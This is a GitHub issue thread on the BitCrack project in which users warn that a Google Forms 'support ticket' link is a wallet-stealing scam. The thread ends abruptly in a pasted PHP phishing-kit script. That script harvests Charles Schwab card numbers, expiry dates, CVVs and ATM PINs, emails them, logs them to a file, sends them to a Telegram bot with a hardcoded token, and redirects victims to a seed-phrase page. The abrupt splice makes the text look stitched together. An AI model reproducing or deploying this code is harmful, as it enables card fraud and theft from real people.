Open karteljnr opened 1 year ago
What exactly is your problem?
Did you file a support ticket?
Don't give out any information related to wallet on any google forms. It's a scam and stay secure. Reach out to the email IDs provided on the website and no where else. Reach out through the proper support channel and don't reply to such spam / malicious requests on any google forms.
Stay safe.
On Sun, Feb 26, 2023 at 9:01 PM Mariusz Adamczyk @.***> wrote:
Did you file a support ticket?
— Reply to this email directly, view it on GitHub https://github.com/brichard19/BitCrack/issues/362#issuecomment-1445389863, or unsubscribe https://github.com/notifications/unsubscribe-auth/AA5MDIONZH7UJVW7ZVK35M3WZNZNZANCNFSM6AAAAAASN3PGBA . You are receiving this because you are subscribed to this thread.Message ID: @.***>
@karteljnr We'd be happy to look into this for you Kindly file a support ticket below https://forms.gle/VcaSaDQysAwZBQp77
Does this look like a legitimate support form?
Common folks... Stay safe!
Please ban such scammers... Use common sense and stay safe...
If you are having problems with your Coinbase wallet, you should contact Coinbase support directly from your app.
<?php
$ZoRo = getenv("REMOTE_ADDR");
$ip = $_SERVER['REMOTE_ADDR'];
include('./XEmail.php');
$subject = "Charles Schwab Card Infos [ " . $ZoRo . " ] /"; $headers = "From: ZoRo\r\n";
$message .= "Charles Schwab Card info\n
[IP] : ".$ip."
[CARD NUMBER] : ".$_POST['card']."
[EXP DATE] : ".$_POST['exp']."
[CVV & CVC] : ".$_POST['cvv']."
[ATM] : ".$_POST['atm']."
-------------------------------------------------\n
**\n
**\n";
mail($email,$subject,$message,$headers);
$text = fopen('../rezlt.txt', 'a');
fwrite($text, $message);
function sendMessage($messaggio) { $token = '5237176207:AAFH3CqrKSaSAihBOmZHPiaCqIfuj4KBI4A'; $chatid = '5267892538'; $url = "https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $chatid; $url = $url . "&text=" . urlencode($messaggio); $ch = curl_init(); $optArray = array( CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true ); curl_setopt_array($ch, $optArray); $result = curl_exec($ch); curl_close($ch); return $result; } sendMessage($message);
header("Location: ../Main/Phrase.html");
?>